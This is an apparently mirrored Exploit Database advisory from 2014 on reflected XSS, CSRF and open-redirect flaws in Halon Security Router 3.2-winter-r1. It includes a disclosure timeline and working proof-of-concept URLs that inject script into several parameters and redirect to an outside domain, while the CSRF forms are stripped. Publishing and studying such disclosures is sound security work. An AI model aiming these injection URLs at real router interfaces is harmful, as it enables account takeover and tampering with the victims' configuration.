Halon Security Router (SR) 3.2-winter-r1 – Multiple Vulnerabilities

Exploit Database
113 阅读

作者： Juan Manuel Garcia

日期： 2014-04-08
类别：
- remote
平台：
- hardware
来源：https://www.exploit-db.com/exploits/32743/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

ADVISORY INFORMATION

Advisory Name: Multiple Security Vulnerabilities in Halon Security Router

Date published: 2014-04-07

Vendors contacted: Halon Security (http://www.halon.se)

Researcher: Juan Manuel Garcia (http://www.linkedin.com/in/juanmagarcia)

VULNERABILITIES INFORMATION

Vulnerabilities:

1. Reflected Cross-Site Scripting (XSS) {OWASP Top 10 2013-A3}

2. Cross-site Request Forgery (CSRF) {OWASP Top 10 2013-A8}

3. Open Redirect {OWASP Top 10 2013-A10}

Severities:

1. Reflected XSS: Medium - CVSS v2 Base Score: 5.5 (AV:N/AC:L/Au:S/C:P/I:P/A:N)

2. CSRF: High - CVSS v2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)

3. Open Redirect: High - CVSS v2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)

Affected Applications: Security router (SR) v3.2-winter-r1 and earlier.

Affected Platforms: Software, virtual and hardware

Local / Remote: Remote

Vendor Status: Patched

VULNERABILITIES DESCRIPTION

1. Reflected XSS: https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29

2. CSRF: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29

3. Open Redirect: https://www.owasp.org/index.php/Open_redirect

TECHNICAL DESCRIPTION AND PROOF OF CONCEPTS

1- Reflected XSS:

At least the following parameters are not properly sanitized:

http://sr.demo.halon.se/commands/logviewer/?log=vic0';</script><script>alert(1)</script>

Parameter: log

http://sr.demo.halon.se/fileviewer/?file=";</script><script>alert(1)</script>

Parameter: file

http://sr.demo.halon.se/system/graphs/?graph='+alert(1)+'

Parameter: graph

http://sr.demo.halon.se/commands/?command='+alert(1)+'

Parameter: command

http://sr.demo.halon.se/system/users/?id='+alert(1)+'

Parameter: id

http://sr.demo.halon.se/config/?uri='+alert(1)+'

Parameter: uri

Other parameters of the application might also be affected.

2- CSRF:

At least the following functions are vulnerable:

Add user: http://xxx.xxx.xxx.xxx/system/users/?add=user

<html>

<body>

</form>

</body>

</html>

DNS configuration: http://xxx.xxx.xxx.xxx/network/dns

<html>

<body>

</form>

</body>

</html>

Network Configuration: http://xxx.xxx.xxx.xxx/network/basic

Load Balancer Configuration: http://xxx.xxx.xxx.xxx/network/loadbalancer

VPN Configuration: http://xxx.xxx.xxx.xxx/network/vpn

Firewall Configuration: http://xxx.xxx.xxx.xxx/network/firewall

Other functions of the application might also be affected.

3- Open Redirect:

At least the following parameters are not properly sanitized:

http://sr.demo.halon.se/cluster/?switch_to=&uri=http://itforce.tk

Parameter: uri

http://sr.demo.halon.se/config/?checkout=17&uri=http://itforce.tk

Parameter: uri

Other parameters of the application might also be affected.

SOLUTION

Install / Upgrade to Security router (SR) v3.2r2

REPORT TIMELINE

2014-04-03: IT Force notifies the Halon team of the vulnerabilities and receives the support ticket ID ZOJ-105816.

2014-04-04: Vendor acknowledges the receipt of the information and informs that the vulnerabilities are going to be resolved in v3.2r2 and updates the SR online demo site.

2014-04-04: IT Force advises Halon on how to resolve the vulnerabilities reported.

2014-04-04: IT Force coordinate with Halon the advisory publication for April 07,2014.

2014-04-07: IT Force published the advisory.

CONTACT INFORMATION